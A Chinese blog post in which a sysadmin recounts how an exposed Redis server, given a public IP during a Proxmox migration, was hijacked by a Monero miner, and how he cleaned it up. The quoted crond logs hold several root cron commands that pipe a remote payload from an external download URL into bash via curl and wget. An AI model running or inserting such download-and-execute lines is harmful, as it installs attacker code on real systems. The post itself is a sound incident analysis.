一不小心,老司机又翻车了

最新推荐文章于 2023-01-17 11:14:06 发布
最新推荐文章于 2023-01-17 11:14:06 发布
阅读量249 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34247155/article/details/85023077
版权

作者:田逸(sery@163.com)

这几天一直忙着往proxmox集群里边迁移服务,进展还是比较顺利。通过整合资源,两个机柜的服务器,下架以后,就剩一个柜子了,后边再迁移一下,还能下架一些旧的配置低的服务器。因为机柜电源的限制,迫不得已还得下架一台有公网ip的旧服务器。为了保证可用性,临时在一台有redis应用的服务器上绑定了一个公网ip。然后开始部署keepalived及haproxy,但搞半天,没把keepalived给安装上,估计是centos版本的问题。确认了一下,就是不安装也不影响业务,就暂时不管它,忙别的事情去了。

四台proxomox组成的集群,加上一台交换机,临时放在另外一个机柜里边。等下架旧服务器后,再把这四台服务器及交换机整合到一个机柜。因此整个下午到夜里,都在折腾这个事情。搬迁的原则是不能停服务,同时担心机器关机可能会导致proxmox集群崩溃。待去机房的兄弟把旧机器下架后,做如下的安排:
(1) 服务器拔掉一根电源线,然后插在目标机柜的插口上。因为是双电源,而且两个机柜是挨着的,只要动作轻柔,可以保证不会断电停机。
(2) 交换机不是双电,一断电集群就可能崩溃。在目标柜子柜子放一交换机,加电。从待搬服务器拔掉一个网线,插到此交换机;接着拔第二台服务器的一根网线,也插过来。于此同时,把另外一口的网线拔掉,观察网络状态。因为proxmox做了网卡绑定(bond),因此这样操作,也不会导致网络中断。
一不小心,老司机又翻车了
确保网线插别的交换机没问题后,就可以从机架上把服务器不停机进行搬迁。

搬迁完,联系相关人等挨个测试应用,看是否正常,本人也时不时查看集群负载,也没有任何波动,一干人等回家散去,放心睡觉。
一不小心,老司机又翻车了

今天醒来,一看qq消息,群里闹翻了,说一个重要的下载业务的数据统计不显示。经排查,是一台redis的物理机出故障所致。

赶紧登陆系统,一通排查,卧槽,/tmp目录下有个文件littletrump!看看这个有没有建立起监听.
一不小心,老司机又翻车了
果然中招!习惯性的查看/etc/passwd、/home目录、crontab等,只有crontab存在麻烦,进行编辑,全是一堆乱码。
一不小心,老司机又翻车了
用dd键狂删,毫无作用。再用echo> /tmp/ crontab.XXXX* 清空,也没有什么作用。进目录/var/spool/cron/ ,把root等文件直接干掉了事。

那么问题来了,这个恶意Muma是怎么进来的?又是干什么用的呢?

先回答恶意muma是干啥的。根据排查,得到一个域名,用浏览器访问,得到如下页面。
一不小心,老司机又翻车了
原来是挖矿的,从crond日志可进一步判断,是挖门罗币的。

Sep 28 01:20:01 Cache crond[10825]: (root) CMD (/usr/lib64/sa/sa1 10 60)
Sep 28 01:20:01 Cache crond[10826]: (root) CMD (curl -fsSLk https://pixeldra.in/api/download/uhUiqw | bash)
Sep 28 01:21:01 Cache crond[11156]: (root) CMD (wget -q -O- https://pixeldra.in/api/download/uhUiqw --no-check-certificate | 
bash)
Sep 28 01:25:01 Cache crond[12391]: (root) CMD (curl -fsSLk https://pixeldra.in/api/download/uhUiqw | bash)
Sep 28 01:28:02 Cache crond[13532]: (root) CMD (wget -q -O- https://pixeldra.in/api/download/uhUiqw --no-check-certificate | 
bash)
Sep 28 01:30:01 Cache crond[14258]: (root) CMD (/usr/lib64/sa/sa1 10 60)
Sep 28 01:30:01 Cache crond[14259]: (root) CMD (curl -fsSLk https://pixeldra.in/api/download/uhUiqw | bash)
Sep 28 01:35:01 Cache crond[16051]: (root) CMD (curl -fsSLk https://pixeldra.in/api/download/uhUiqw | bash)
Sep 28 01:35:01 Cache crond[16054]: (root) CMD (wget -q -O- https://pixeldra.in/api/download/uhUiqw --no-check-certificate | 
bash)
Sep 28 01:40:01 Cache crond[18117]: (root) CMD (/usr/lib64/sa/sa1 10 60)
Sep 28 01:40:01 Cache crond[18118]: (root) CMD (curl -fsSLk https://pixeldra.in/api/download/uhUiqw | bash)
Sep 28 01:42:01 Cache crond[18996]: (root) CMD (wget -q -O- https://pixeldra.in/api/download/uhUiqw --no-check-certificate | 
bash)
………………….省略若干……………………….

第二个问题“恶意muma是怎么进来的呢”?是因为redis监听地址是0.0.0.0:6379,我昨天为了做keepalived HA,给网卡绑定了公网地址。有心人一扫描,就发现这个redis版本漏洞,就利于它侵略进来了。

后边的处理就简单了。Proxmox平台部署一套redis,把备份复制过去,恢复。现有的系统干掉,重装系统,另做他用。

更加体系化和实例化的proxmox超融合私有云实践系列文章,请移步本人专栏“人人都能玩的私有云神器-proxmox”,猛戳此处,片刻直达!
一不小心,老司机又翻车了

weixin_34247155
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开源超融合私有云神器proxmox VE
linux硬派运维
12-16 1万+
Prxomox VE由位于奥地利维也纳的Proxmox Server Solutions GmbH开发,这让人有点意外。其实欧洲在IT技术方面,还是很强的,比如大名鼎鼎的mysql,出自瑞典;分布式文件系统moosefs,出自波兰。Proxmox主打产品有两款:Proxmox Virtual Environment与Proxmox Mail Gateway,本专栏仅仅涉及proxmox虚拟化,即P...
/usr/lib64/sa/sa1脚本解释
m0_73698480的博客
04-18 1305
这个脚本是 Linux 系统上的 sysstat 工具的一部分,在/etc/cron.d/sysstat这个定时任务下执行,用来收集系统性能数据
at和cron(计划任务)
y_zilong的博客
04-19 344
1、at (一次性任务) 前提:服务必须启动 [root@y_zilong ~]#systemctl status atd.service ● atd.service - Job spooling tools Loaded: loaded (/usr/lib/systemd/system/atd.service; enabled; vendor preset: enabled) Active: active (running) since Mon 2021-04-19 08:52:00
Linux操作系统基础知识和常用指令学习笔记
zuzhiang的博客
05-12 1731
本文是Linux操作系统相关的知识,参考的资料主要有《鸟哥的Linux私房菜-基础版(第四版)》的第四到第十二章,以及尚硅谷的Linux教程。笔记不可能面面俱到,但是常用的命令和知识应该都包括了,此外指令的选项有很多,笔记中也是只列出了常用的几个,较完整的介绍还请大家自行搜索。如果有什么错误还请大家指出。 一、Linux基础知识 1. Linux文件目录 (1) 文件目录 /bin:binary的缩写,存储可执行文件 /boot:存储开机会用到的文件 /dev:存储装置和接口设备 /ect:存储配置
计划将来的LINUX任务
jsut_rick的博客
08-01 1240
计划将来的LINUX任务 使用at计划一次性任务 这不是单机工具,而是一个系统守护进程(atd),它有一组命令行工具可与守护进程(at、atq等)进行交互。默认自动安装及启用。atd守护进程可在at软件包中找到。 用户(包括root)可以使用命令行工具at为atd守护进程的作业排除。atd守护进程提供了a到z共26个队列,作业按字母顺序排列,队列越后,系统优先级越低。 计划作业 使用命令...
crontab极简教程
陈明亮的博客
11-28 715
[toc] ### crontab简介 Linux crontab是用来定期执行程序的命令。 当安装完成操作系统之后,默认便会启动此任务调度命令。 ### crontab常用命令 - crontab -e 打开vi编辑器,编写一个定时任务,退出vi后,若vi内容不为空,则会创建一个任务。 - crontab -l 查看当前已经创建的定时任务 - crontab -r 删除当前用户创建的定时任务。一般删除定时任务不这样操作,而是使用crontab -e 命令打开任务,将任务内容清空,保存并退出..
行业资料-交通装置-一种倾翻车的制动机构.zip
08-21
行业资料-交通装置-一种倾翻车的制动机构.zip
行业资料-交通装置-一种不摘钩专用敞车用折返式翻车机卸车系统.zip
08-17
行业资料-交通装置-一种不摘钩专用敞车用折返式翻车机卸车系统.zip
翻车机司机安全技术操作规程.doc
02-12
翻车机司机安全技术操作规程.doc
行业资料-交通装置-一种新型翻车机溜槽料位检测系统及方法.zip
09-03
行业资料-交通装置-一种新型翻车机溜槽料位检测系统及方法.zip
矿用液压翻车机的设计
06-29
电动翻车机启动时扭矩瞬时增大常造成电动翻车机电机烧毁现象,基于此,液压翻车机采用低速大扭矩马达来直接驱动传动滚轮使滚筒旋转,实现翻转矿车卸料的目的。并基于MATLAB软件绘制了翻车机翻转过程的扭矩图,得出了翻车...
Linux性能调优之sar详解
zyqash的博客
01-17 6791
sar是一个采集,报告和存储计算机负载信息的工具。有的时候,我们要通过对系统的cpu负载等性能数值的查看,来判排查系统产生某种故障(经常死机或者运行速度突然变慢)的原因。但是,简单的top,uptime,w等命令只可以查看当前的负载,而无法查看过去的某一时间段的cpu的负载情况。下面就介绍一个用于性能分析的命令,其可以用于查看过去的某一时间段的cpu的负载情况(系统性能)。查看某一时间段的cpu使用情况,请直接跳到查看sa日志。%usr:CPU在用户模式下,执行进程的时间百分比%nice。
linux6系统日志,centos-6.5 修改系统日志时间戳格式
weixin_35024589的博客
05-01 519
centos-6.5 修改系统日志时间戳格式:原来格式:$template TraditionalFormat,"%timegenerated% %HOSTNAME% %syslogtag%%msg%"# vim /var/log/cronDec 22 19:40:01 server112 CROND[4545]: (root) CMD (/usr/lib64/sa/sa1 1 1)# vim /...
Linux系统故障排除
热门推荐
知其然,也要知其所以然
08-10 1万+
Linux系统故障排除 话说软件项目的一般流程是:设计、编码、调优、上线。调优过程中经常遇到系统性能不够的时候,但是话说回来性能不好也正常,如果随便写点代码性能就牛X的一塌糊涂,可能也就不需要那么多的所谓的Best Prticace的经验总结了。 最近看到一本书《DevOps故障排除》,书很薄,里面的内容可能在其他书中都有讲解,但是他总结的很好,可能对系统的发生故障后的排除流程做了一般总结,对
正则表达式清理日志
bodouer7979的博客
08-21 206
字段提取中正则表达式的使用:提取日志中的信息格式:(?<字段名称>匹配具体信息的正则表达式) 日志样例:<78> 2019-08-21T17:10:01.461970+08:00 localhost CROND: (root) CMD (/usr/lib64/sa/sa1 1 1) 正则表达式\<(?<prl>\d+)\>\s+(?<time...
Proxmox虚拟环境搭建
liaomin416100569的专栏
12-02 1万+
ProxmoxVE 是一个完整的、开源的企业虚拟化服务器管理平台。它在单个平台上紧密集成了 KVM 管理程序和 Linux 容器(LXC)、软件定义的存储和网络功能。通过集成的基于 web 的用户界面,您可以轻松地管理虚拟机和容器、集群高可用性或集成的灾难恢复工具。企业级的特性和100% 基于软件的重点使 Proxmox VE 成为虚拟化您的 IT 基础设施、优化现有资源以及以最低成本提高效率的完美选择。
linux 日志服务器搭建及配置,Rsyslog日志服务安装配置
weixin_34512840的博客
05-10 292
rsyslog服务端配置 CentOS6.4 x64系统 系统自带rsyslog 5.8版本rsyslog 是一个 syslogd 的多线程增强版。现在Fedora和Ubuntu, rhel6默认的日志系统都是rsyslog了rsyslog负责写入日志, logrotate负责备份和删除旧日志, 以及更新日志文件####################################首先部署好...
python cron_cron执行python无果
weixin_36046702的博客
01-14 534
执行以下crontab,xxx.py文件中有print输出:18 16 * /usr/local/python3/bin/python3.7 /root/xxx.py1.确认了cron正常运行,测试了定时输出2.确认了 /usr/local/python3/bin/python3.7 /root/xxx.py 可以执行,也得到了正确的结果3.确认了/var/log/cron 有内容,看到了执行...
linux瓶颈测试软件,用 sar 工具检测系统性能瓶颈
weixin_30436581的博客
05-05 372
sar 命令用用收集、报告、或者保存 UNIX / Linux 系统的活动信息。它保存选择的计数器到操作系统的 /var/log/sa/sadd 文件中。从收集的数据中,你可以得到许多关于你的服务器的信息:CPU 使用率内存页面和使用率网络 I/O 和传输统计进程创建活动所有的块设备活动每秒中断数等等sar 命令的输出能够用于识别服务器瓶颈。但是,分析 sar 命令提供的信息可能比较困难,所以要使...
js获取当前一周的日期
最新发布
05-30
可以使用 JavaScript 来获取当前一周的日期。以下是一个简单的脚本示例: ```javascript // 获取当前日期 var today = new Date(); // 获取本周的第一天(周日) var firstDay = new Date(today.getFullYear(), ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值